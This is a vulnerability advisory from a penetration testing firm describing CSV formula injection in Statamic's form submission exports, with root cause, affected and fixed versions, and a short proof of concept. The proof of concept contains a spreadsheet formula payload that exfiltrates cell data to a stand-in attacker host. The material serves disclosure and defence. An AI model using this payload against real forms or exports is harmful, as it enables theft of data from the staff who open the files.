Statamic: CSV Formula Injection in Form Submission Exports
Unauthenticated form submitters can enter spreadsheet formulas into fields that the form submission CSV export writes verbatim; they are evaluated in the spreadsheet of a Control Panel user who opens the export.
Advisory ID: TP-2026-015
Product: Statamic (Laravel-based, flat-file-first CMS)
Vulnerability type: CSV formula injection (CWE-1236)
CVE: CVE-2026-54243
CVSS 3.1: 6.1 (Medium) · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Affected versions: < 5.73.24, < 6.20.1
Fixed in: 5.73.24, 6.20.1
Vendor advisory: GHSA-h77m-qrj7-jxcw
Reported: 31 May 2026
Summary
Statamic is a Laravel-based, flat-file-first CMS. When form submissions are exported to CSV, the visitor-supplied field values are written verbatim without neutralizing the leading characters that spreadsheets treat as formula triggers (=, +, -, @). An unauthenticated submitter can therefore enter a formula into a form field that reaches the CSV file as-is. When a Control Panel user later opens the export in Excel, LibreOffice Calc, or Google Sheets, the spreadsheet evaluates the value as a formula. The vulnerability thus takes effect not in Statamic itself but in the spreadsheet of the user viewing the export. turingpoint verified the flow and reported it responsibly to the vendor.
Root cause
The form submission CSV exporter (src/Forms/Exporters/CsvExporter.php) writes values via League\Csv\Writer without registering a formula-escaping formatter (EscapeFormula). As a result, field values that begin with one of the trigger characters =, +, -, or @ reach the CSV cells unchanged. Those values come from the form submitters’ input, who are unauthenticated on publicly reachable forms. Spreadsheets interpret cell contents beginning with these characters as formulas by default, so something like =HYPERLINK(...) can be used for data exfiltration when the export is opened. Because the export is triggered and opened in the Control Panel by a privileged user, the evaluation hits their working environment.
Proof of Concept
Prerequisite is a publicly reachable Statamic form and a Control Panel user who exports the submissions to CSV:
# 1) As an unauthenticated visitor, submit a public Statamic form and put a
# spreadsheet formula into a text field:
Field value: =HYPERLINK("https://attacker.example/?c="&A1,"Click")
# Other leading trigger characters: = + - @
# 2) A Control Panel user exports the form submissions as CSV
# (Form > Export) and opens the file in Excel/LibreOffice/Google Sheets.
# 3) The spreadsheet evaluates the cell content as a formula:
# =HYPERLINK exfiltrates cell data to the attacker on click,
# other formulas may trigger further actions depending on the application.
Because the exporter does not neutralize the trigger characters, the formula remains in the CSV cell and is evaluated when the file is opened in the user’s spreadsheet.
Impact
- Execution of spreadsheet formulas in the application of a Control Panel user who opens a CSV export.
- Data exfiltration from the opened spreadsheet, for example via
=HYPERLINK, plus further formula-triggered actions depending on the application. - Triggerable by unauthenticated form submitters; the effect occurs in the user’s spreadsheet, not in Statamic itself.
References
Is Something Like This in Your Software?
Our team found this vulnerability in the course of its work. Have your applications tested by the same specialists, with a penetration test from turingpoint.